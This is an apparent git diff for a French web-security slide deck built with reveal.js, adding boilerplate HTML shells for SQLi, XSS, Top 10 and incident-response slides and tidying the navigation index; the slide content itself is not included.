+  * [<i class="fa fa-stack-overflow"></i> Disable firefox same origin policy](http://stackoverflow.com/questions/17088609/disable-firefox-same-origin-policy)
+
+Note:
+- l'introduction de cette nouvelle possibilitÃ© implique nÃ©cessairement que les serveurs doivent gÃ©rer de nouvelles entÃªtes, et doivent renvoyer les ressources avec de nouvelles entÃªtes Ã©galement
+- doit Ãªtre supportÃ© par le navigateur
+- la valeur * est possible mais risquÃ©e
+- requÃªtes simples, prÃ©-vÃ©rifiÃ©es avec le verbe OPTIONS, avec habilitations en forcant l'envoie du cookie
diff --git a/content/slides/1337/reagir.html b/content/slides/1337/reagir.html
new file mode 100644
index 0000000000000000000000000000000000000000..88b0b01ef74dd1a8e5f7eb106c202b4d40436ab1
--- /dev/null
+++ b/content/slides/1337/reagir.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>rÃ©agir</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/reagir/00_contexte.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/1337/sqli.html b/content/slides/1337/sqli.html
new file mode 100644
index 0000000000000000000000000000000000000000..ddd9c32f1d6bbf15c7e2f34ae7b1ec67a5e695c4
--- /dev/null
+++ b/content/slides/1337/sqli.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>SQLi</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/sqli.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/1337/top10.html b/content/slides/1337/top10.html
new file mode 100644
index 0000000000000000000000000000000000000000..c5c21d8da07ec25562a5959c9b993345d8f29697
--- /dev/null
+++ b/content/slides/1337/top10.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>Top 10</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/top10.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/1337/xss.html b/content/slides/1337/xss.html
new file mode 100644
index 0000000000000000000000000000000000000000..28c20746f017ea894a824c77137521583ebd0178
--- /dev/null
+++ b/content/slides/1337/xss.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>XSS</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/xss.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/index.html b/content/slides/index.html
index e004a7b839986300b8fbfa8f6d56eb8345ebd6b7..df3bcef4ecc2ec4b398a446a89c05709b597ef91 100644
--- a/content/slides/index.html
+++ b/content/slides/index.html
@@ -58,12 +58,7 @@
       <li>
         <a href="1337/sqli.html">SQLi</a>
         <ul>
-          <li>
-            Exploit
-            <ul>
-              <li><a href="1337/drupalgeddon.html">Drupalgeddon</a></li>
-            </ul>
-          </li>
+          <li><a href="1337/drupalgeddon.html">Drupalgeddon</a></li>
         </ul>
       </li>
     </ul>
@@ -71,11 +66,9 @@
   <li>
     Se prot&eacute;ger
     <ul>
-      <li>
-        <li><a href="1337/top10.html">Top10</a></li>
-        <li><a href="1337/anticiper.html">Anticiper</a></li>
-        <li><a href="1337/anticiper.html">R&eacute;agir</a></li>
-      </li>
+      <li><a href="1337/top10.html">Top10</a></li>
+      <li><a href="1337/anticiper.html">Anticiper</a></li>
+      <li><a href="1337/reagir.html">R&eacute;agir</a></li>
     </ul>
   </li>
 </ul>